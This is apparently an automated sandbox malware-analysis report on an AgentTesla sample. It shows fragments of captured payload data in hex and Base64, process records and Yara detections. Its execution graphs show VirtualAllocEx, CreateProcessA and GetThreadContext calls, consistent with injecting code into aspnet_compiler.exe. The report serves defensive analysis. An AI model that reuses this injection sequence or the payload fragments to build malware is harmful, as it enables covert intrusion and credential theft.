                            2022-03-14 16:02:12 UTC305INData Raw: 4a 76 73 41 41 41 42 68 5a 76 5a 77 41 41 43 67 41 43 62 37 49 41 41 41 59 57 62 32 63 41 41 41 6f 41 41 6d 2b 30 41 41 41 47 46 6d 39 6e 41 41 41 4b 41 41 4a 76 74 67 41 41 42 68 5a 76 5a 77 41 41 43 67 41 43 46 69 68 6e 41 41 41 4b 41 41 49 6f 61 41 41 41 43 67 41 71 41 41 42 4f 4b 77 55 6f 41 61 56 6e 4e 51 4a 37 47 67 41 41 42 44 67 41 41 41 41 41 4b 6a 34 72 42 53 6a 79 72 69 52 72 41 67 4e 39 47 67 41 41 42 43 70 4f 4b 77 55 6f 69 46 56 51 50 67 4a 37 47 77 41 41 42 44 67 41 41 41 41 41 4b 6a 34 72 42 53 68 6a 66 43 68 73 41 67 4e 39 47 77 41 41 42 43 70 4f 4b 77 55 6f 4a 66 73 71 57 51 4a 37 48 41 41 41 42 44 67 41 41 41 41 41 4b 6a 34 72 42 53 69 6a 4e 7a 6c 6f 41 67 4e 39 48 41 41 41 42 43 70 4f 4b 77 55 6f 59 64 52 42 52 77 4a 37 48 51 41 41 42
                            Data Ascii: JvsAAABhZvZwAACgACb7IAAAYWb2cAAAoAAm+0AAAGFm9nAAAKAAJvtgAABhZvZwAACgACFihnAAAKAAIoaAAACgAqAABOKwUoAaVnNQJ7GgAABDgAAAAAKj4rBSjyriRrAgN9GgAABCpOKwUoiFVQPgJ7GwAABDgAAAAAKj4rBShjfChsAgN9GwAABCpOKwUoJfsqWQJ7HAAABDgAAAAAKj4rBSijNzloAgN9HAAABCpOKwUoYdRBRwJ7HQAAB
                            2022-03-14 16:02:12 UTC321INData Raw: 73 41 41 67 42 34 41 44 73 41 41 51 42 37 41 44 30 41 41 67 42 36 41 44 30 41 41 51 42 39 41 44 38 41 41 67 42 38 41 44 38 41 41 51 42 2f 41 45 45 41 41 67 42 2b 41 45 45 41 41 51 43 42 41 45 4d 41 41 67 43 41 41 45 4d 41 41 51 43 44 41 45 55 41 41 67 43 43 41 45 55 41 41 51 43 46 41 45 63 41 41 67 43 45 41 45 63 41 41 51 43 48 41 45 6b 41 41 67 43 47 41 45 6b 41 41 51 43 4a 41 45 73 41 41 67 43 49 41 45 73 41 41 51 43 4c 41 45 30 41 41 67 43 4b 41 45 30 41 41 51 43 4e 41 45 38 41 41 67 43 4d 41 45 38 41 41 51 43 50 41 46 45 41 41 67 43 4f 41 46 45 41 41 51 43 52 41 46 4d 41 41 67 43 51 41 46 4d 41 41 51 43 54 41 46 55 41 41 67 43 53 41 46 55 41 41 51 43 56 41 46 63 41 41 67 43 55 41 46 63 41 41 51 43 58 41 46 6b 41 41 67 43 57 41 46 6b 41 41 51 43 5a 41
                            Data Ascii: sAAgB4ADsAAQB7AD0AAgB6AD0AAQB9AD8AAgB8AD8AAQB/AEEAAgB+AEEAAQCBAEMAAgCAAEMAAQCDAEUAAgCCAEUAAQCFAEcAAgCEAEcAAQCHAEkAAgCGAEkAAQCJAEsAAgCIAEsAAQCLAE0AAgCKAE0AAQCNAE8AAgCMAE8AAQCPAFEAAgCOAFEAAQCRAFMAAgCQAFMAAQCTAFUAAgCSAFUAAQCVAFcAAgCUAFcAAQCXAFkAAgCWAFkAAQCZA
                            2022-03-14 16:02:12 UTC337INData Raw: 43 45 41 77 59 52 61 41 4d 47 45 58 41 45 42 68 4b 42 4c 51 51 41 41 51 45 49 44 77 63 46 45 6e 55 53 67 54 45 53 67 54 55 64 45 6f 45 78 43 41 55 67 41 52 4a 31 43 41 59 67 41 42 30 53 67 54 45 47 49 41 45 53 67 54 30 49 43 67 41 43 45 6f 43 74 45 6e 55 53 67 54 55 46 49 41 49 42 48 42 77 46 49 41 41 53 67 53 30 45 49 41 45 42 48 41 6f 67 41 78 4b 41 37 52 77 53 67 50 45 63 42 69 41 42 41 52 4b 41 37 51 49 47 41 67 51 47 45 59 43 63 42 41 59 52 67 4b 41 45 42 68 47 41 70 41 51 47 45 59 43 6f 42 41 59 52 67 4b 77 45 42 68 47 41 73 41 51 47 45 59 43 30 47 41 45 41 43 6b 31 35 56 47 56 74 63 47 78 68 64 47 55 49 4d 54 45 75 4d 43 34 77 4c 6a 41 41 41 41 55 67 41 67 45 4f 44 67 67 42 41 41 45 41 41 41 41 41 41 41 59 67 41 51 45 52 67 55 6b 51 41 51 41 4c 54
                            Data Ascii: CEAwYRaAMGEXAEBhKBLQQAAQEIDwcFEnUSgTESgTUdEoExCAUgARJ1CAYgAB0SgTEGIAESgT0ICgACEoCtEnUSgTUFIAIBHBwFIAASgS0EIAEBHAogAxKA7RwSgPEcBiABARKA7QIGAgQGEYCcBAYRgKAEBhGApAQGEYCoBAYRgKwEBhGAsAQGEYC0GAEACk15VGVtcGxhdGUIMTEuMC4wLjAAAAUgAgEODggBAAEAAAAAAAYgAQERgUkQAQALT


                            0102030s020406080100

                            Click to jump to process

                            0102030s0.002040MB

                            Click to jump to process

                            • File
                            • Registry
                            • Network

                            Click to dive into process behavior distribution

                            Target ID:0
                            Start time:17:02:01
                            Start date:14/03/2022
                            Path:C:\Users\user\Desktop\AgentTesla.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\AgentTesla.exe"
                            Imagebase:0x1310000
                            File size:7255264 bytes
                            MD5 hash:81448798CCA71E2B8BCE354AFCF098B4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Target ID:1
                            Start time:17:02:13
                            Start date:14/03/2022
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Imagebase:0x360000
                            File size:55400 bytes
                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Execution Graph

                            Execution Coverage

                            Dynamic/Packed Code Coverage

                            Signature Coverage

                            Execution Coverage:10.8%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:9
                            Total number of Limit Nodes:0
                            Show Legend
                            Hide Nodes/Edges
                            execution_graph 2202 114b4a0 2203 114b4e4 VirtualAllocEx 2202->2203 2205 114b55c 2203->2205 2206 114a758 2207 114a7df CreateProcessA 2206->2207 2209 114aa34 2207->2209 2210 114abe8 2211 114ac31 GetThreadContext 2210->2211 2213 114aca9 2211->2213

                            Executed Functions

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 130 11484b0-11484dc 131 11484e3-114854f 130->131 132 11484de 130->132 135 1148555-114858d 131->135 136 114866e-1148687 131->136 132->131 137 1148594-11485cd 135->137 138 114858f 135->138 140 1148782-114879e 136->140 141 114868d-11486b9 136->141 147 11485d4-11485e2 137->147 148 11485cf 137->148 138->137 149 11489ee-11489f4 140->149 143 11486c0-11486e7 141->143 144 11486bb 141->144 159 11486ee-11486fc 143->159 160 11486e9 143->160 144->143 151 11485e4 147->151 152 11485e9-1148622 147->152 148->147 153 11487a3-11487c6 149->153 154 11489fa-1148a04 149->154 151->152 169 1148624 152->169 170 1148629-1148637 152->170 163 11487cd-11487d8 153->163 164 11487c8 153->164 155 1148a06-1148a13 154->155 161 1148703-1148736 159->161 162 11486fe 159->162 160->159 178 114873d-114874b 161->178 179 1148738 161->179 162->161 166 11487df-11487e4 163->166 167 11487da 163->167 164->163 171 11487e6 166->171 172 11487eb-1148823 166->172 167->166 169->170 173 114863e-1148668 170->173 174 1148639 170->174 171->172 186 1148825 172->186 187 114882a-114889a 172->187 173->136 174->173 181 1148752-114877c 178->181 182 114874d 178->182 179->178 181->140 182->181 186->187 194 11488a1-11488cd 187->194 195 114889c 187->195 197 11488d4-11488df 194->197 198 11488cf 194->198 195->194 199 11488e6-11488eb 197->199 200 11488e1 197->200 198->197 201 11488f2-11488ff 199->201 202 11488ed 199->202 200->199 204 114890a-114894d call 1148410 201->204 202->201 208 11489e3-11489e7 204->208 209 1148953-1148976 204->209 208->149 210 11489e9 208->210 212 114897d-1148988 209->212 213 1148978 209->213 210->149 214 114898f-1148994 212->214 215 114898a 212->215 213->212 216 1148996 214->216 217 114899b-11489d3 214->217 215->214 216->217 221 11489d5 217->221 222 11489da-11489e1 217->222 221->222 222->155
                            Memory Dump Source
                            • Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 169c38ae88948f9af22aa668aa0feea87812363d7dbca2d07b5bce53fcd48f1f
                            • Instruction ID: d84f1589cab2534738907ca4a9cdebdfe59d9357d55dc27c059778ce280d35de
                            • Opcode Fuzzy Hash: 169c38ae88948f9af22aa668aa0feea87812363d7dbca2d07b5bce53fcd48f1f
                            • Instruction Fuzzy Hash: ABF13D78E002198FDB58DFA4C891BADB7B6BF88314F54C069DA09AB341DB745E84CF61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 223 1140417-1140468 224 114046f-11404b1 223->224 225 114046a 223->225 227 11404b3-11404b6 224->227 225->224 228 11404b9-11404bf 227->228 229 11404c1 228->229 230 11404c8-11404c9 228->230 231 11404f0-11404f5 229->231 232 114068a-1140690 call 11411ad 229->232 233 1140624-1140625 229->233 234 1140797 229->234 235 114065e-1140664 229->235 236 114050e-114052e 229->236 237 11407cf-11407f7 229->237 238 11405d9-1140618 229->238 230->231 230->232 240 11404fb-114050c 231->240 244 1140696-11406e7 232->244 242 114062f-114064d 233->242 243 114079f-11407a8 234->243 235->232 236->228 246 1140530-1140538 236->246 237->227 238->228 257 114061e-114061f 238->257 240->228 242->228 253 1140653-1140659 242->253 251 11407ae-11407b4 243->251 262 11407f9 244->262 246->228 256 11407ba-11407ca 251->256 253->228 256->228 276 114075e-114075f 256->276 257->227 265 1140801-114080e 262->265 267 1140810-114081c 265->267 268 1140838 265->268 270 1140826-114082c 267->270 271 114081e-1140824 267->271 269 114083e-1140842 268->269 273 1140836 270->273 271->273 273->269 276->227
                            Memory Dump Source
                            • Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 866a3905b79e8d1f150573e8f9b4351432a8a0ca17f77706b623f452426593a9
                            • Instruction ID: 923649dc5c3db3d92293e209400965df7a552ce412145191760d37dca129f0d6
                            • Opcode Fuzzy Hash: 866a3905b79e8d1f150573e8f9b4351432a8a0ca17f77706b623f452426593a9
                            • Instruction Fuzzy Hash: DA81E474D04258CFDB18CFAAD8446EDBBB6BF89300F14C0AAE909A7356DB385985CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 332 1140448-1140468 333 114046f-11404b1 332->333 334 114046a 332->334 336 11404b3-11404b6 333->336 334->333 337 11404b9-11404bf 336->337 338 11404c1 337->338 339 11404c8-11404c9 337->339 340 11404f0-11404f5 338->340 341 114068a-1140690 call 11411ad 338->341 342 1140624-1140625 338->342 343 1140797 338->343 344 114065e-1140664 338->344 345 114050e-114052e 338->345 346 11407cf-11407f7 338->346 347 11405d9-1140618 338->347 339->340 339->341 349 11404fb-114050c 340->349 353 1140696-11406e7 341->353 351 114062f-114064d 342->351 352 114079f-11407a8 343->352 344->341 345->337 355 1140530-1140538 345->355 346->336 347->337 366 114061e-114061f 347->366 349->337 351->337 362 1140653-1140659 351->362 360 11407ae-11407b4 352->360 371 11407f9 353->371 355->337 365 11407ba-11407ca 360->365 362->337 365->337 385 114075e-114075f 365->385 366->336 374 1140801-114080e 371->374 376 1140810-114081c 374->376 377 1140838 374->377 379 1140826-114082c 376->379 380 114081e-1140824 376->380 378 114083e-1140842 377->378 382 1140836 379->382 380->382 382->378 385->336
                            Memory Dump Source
                            • Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3b0e6ed145816e109c49cd62dcd8f302cd5ad49c9c1caa7e7163bca1c5a1412
                            • Instruction ID: 381cb5068dd4f06a57ad530a83ea089ca7053f89092f5450c664d06cce840987
                            • Opcode Fuzzy Hash: a3b0e6ed145816e109c49cd62dcd8f302cd5ad49c9c1caa7e7163bca1c5a1412
                            • Instruction Fuzzy Hash: CF71C374E04618CFEB18CFAAD844AEDBBB6BF89300F14C069E909A7355DB385985CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 114a758-114a7f1 2 114a7f3-114a80a 0->2 3 114a83a-114a862 0->3 2->3 6 114a80c-114a811 2->6 7 114a864-114a878 3->7 8 114a8a8-114a8fe 3->8 9 114a834-114a837 6->9 10 114a813-114a81d 6->10 7->8 18 114a87a-114a87f 7->18 16 114a944-114aa32 CreateProcessA 8->16 17 114a900-114a914 8->17 9->3 11 114a821-114a830 10->11 12 114a81f 10->12 11->11 15 114a832 11->15 12->11 15->9 36 114aa34-114aa3a 16->36 37 114aa3b-114ab20 16->37 17->16 26 114a916-114a91b 17->26 19 114a881-114a88b 18->19 20 114a8a2-114a8a5 18->20 23 114a88d 19->23 24 114a88f-114a89e 19->24 20->8 23->24 24->24 25 114a8a0 24->25 25->20 28 114a91d-114a927 26->28 29 114a93e-114a941 26->29 30 114a929 28->30 31 114a92b-114a93a 28->31 29->16 30->31 31->31 33 114a93c 31->33 33->29 36->37 49 114ab30-114ab34 37->49 50 114ab22-114ab26 37->50 52 114ab44-114ab48 49->52 53 114ab36-114ab3a 49->53 50->49 51 114ab28 50->51 51->49 55 114ab58-114ab5c 52->55 56 114ab4a-114ab4e 52->56 53->52 54 114ab3c 53->54 54->52 58 114ab92-114ab9d 55->58 59 114ab5e-114ab87 55->59 56->55 57 114ab50 56->57 57->55 59->58
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0114AA1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID: ^(VI$^(VI
                            • API String ID: 963392458-3564410219
                            • Opcode ID: 4daa5bb4dfaef2d2c89456182fe2cc5f723817e91b1265366fc2acdb3c0530d1
                            • Instruction ID: 0b56b6356a5a5ce5dfe31bf139cbe31fb8e91d7cf3d4c9c54d4d6083dc7d1228
                            • Opcode Fuzzy Hash: 4daa5bb4dfaef2d2c89456182fe2cc5f723817e91b1265366fc2acdb3c0530d1
                            • Instruction Fuzzy Hash: BBC11371D4022D8FDB24CFA8D840BEEBBB1BF49304F0595A9D54AB7240EB749A85CF94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 63 114b4a0-114b55a VirtualAllocEx 66 114b563-114b5ad 63->66 67 114b55c-114b562 63->67 67->66
                            APIs
                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0114B54A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID: ^(VI
                            • API String ID: 4275171209-3744052019
                            • Opcode ID: 722c618608cca07ba0c287cf989ec658eb512d5daa68687d3f9df1c8ffa368b3
                            • Instruction ID: 2ba6edbe45f259d854e3c84f10ab3ad5c04c5deb4d58f1d8a51e9d4d77b1736a
                            • Opcode Fuzzy Hash: 722c618608cca07ba0c287cf989ec658eb512d5daa68687d3f9df1c8ffa368b3
                            • Instruction Fuzzy Hash: B031AAB4D042589FCF14CFA9D880ADEFBB1BB49314F10902AE914BB310D735A906CF98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 114abe8-114ac48 74 114ac5f-114aca7 GetThreadContext 72->74 75 114ac4a-114ac5c 72->75 77 114acb0-114acfc 74->77 78 114aca9-114acaf 74->78 75->74 78->77
                            APIs
                            • GetThreadContext.KERNEL32(?,?), ref: 0114AC97
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd
                            Similarity
                            • API ID: ContextThread
                            • String ID: ^(VI
                            • API String ID: 1591575202-3744052019
                            • Opcode ID: b1a62fc8b83950ed916001a3ef2c025bd8e029561983e91f69b9a57949e960b2
                            • Instruction ID: 729e64b56bc3ee4f3e6fa794af5c27d35a3ad69fbe64a043614bdfa8189c50d2
                            • Opcode Fuzzy Hash: b1a62fc8b83950ed916001a3ef2c025bd8e029561983e91f69b9a57949e960b2
                            • Instruction Fuzzy Hash: C131CBB4D002589FDB14CFA9D884AEEFBF1BF49314F14802AE419B7240D738A949CF94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Memory Dump Source
                            • Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72d077811c0690be69fec38bca371fd253b1880629351e8bac938dccc580a50f
                            • Instruction ID: 1764971ae7b5b7024ca3d36d9abdef78000ebdeb4aac1ebb5478d6d6f2f9ff4b
                            • Opcode Fuzzy Hash: 72d077811c0690be69fec38bca371fd253b1880629351e8bac938dccc580a50f
                            • Instruction Fuzzy Hash: 36717C70E012489FDB18DFBAE845A9EBBF3FB88344F04C52AD104EB229EB7559058B41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42afd22c1f20d1bf746f7fd45190f64e7298f3ea402a710a9b38c416946a173b
                            • Instruction ID: 2b498fa86257fde341e964dd040e44876ecd062717faa45b7a0915f95b747d10
                            • Opcode Fuzzy Hash: 42afd22c1f20d1bf746f7fd45190f64e7298f3ea402a710a9b38c416946a173b
                            • Instruction Fuzzy Hash: 64615D70E012889FDB18DFBAE444A9EBBF3FB88344F04C42AD104EB669EB7559058F51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c6fb112011d919262ed15b394c5ca7b9f019564696fd0bf47fd6996227db2fd0
                            • Instruction ID: 0eeba02300cf4f12912d9b3ad3eca1ec5afad89e44e775773604851e8a7bdbad
                            • Opcode Fuzzy Hash: c6fb112011d919262ed15b394c5ca7b9f019564696fd0bf47fd6996227db2fd0
                            • Instruction Fuzzy Hash: 67413F71E016198BEB5CCF6BCD4079AFAF7AFC9300F14C1BA951CA6254DB7505958F01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.380946428.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1140000_AgentTesla.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fe9db2163176b5680b0cc06badf18e98bb2ca2f6ab4debcd541cc9828d445586
                            • Instruction ID: 69a7a0e12269a424c74ab4dbf5ace11c7d382d1d27d487a782fe9be3820ec747
                            • Opcode Fuzzy Hash: fe9db2163176b5680b0cc06badf18e98bb2ca2f6ab4debcd541cc9828d445586
                            • Instruction Fuzzy Hash: E1414271E016199BEB6CCF6BCD4069EFAF3AFC9310F14C1BA945CA6224EB3505568F41
                            Uniqueness

                            Uniqueness Score: -1.00%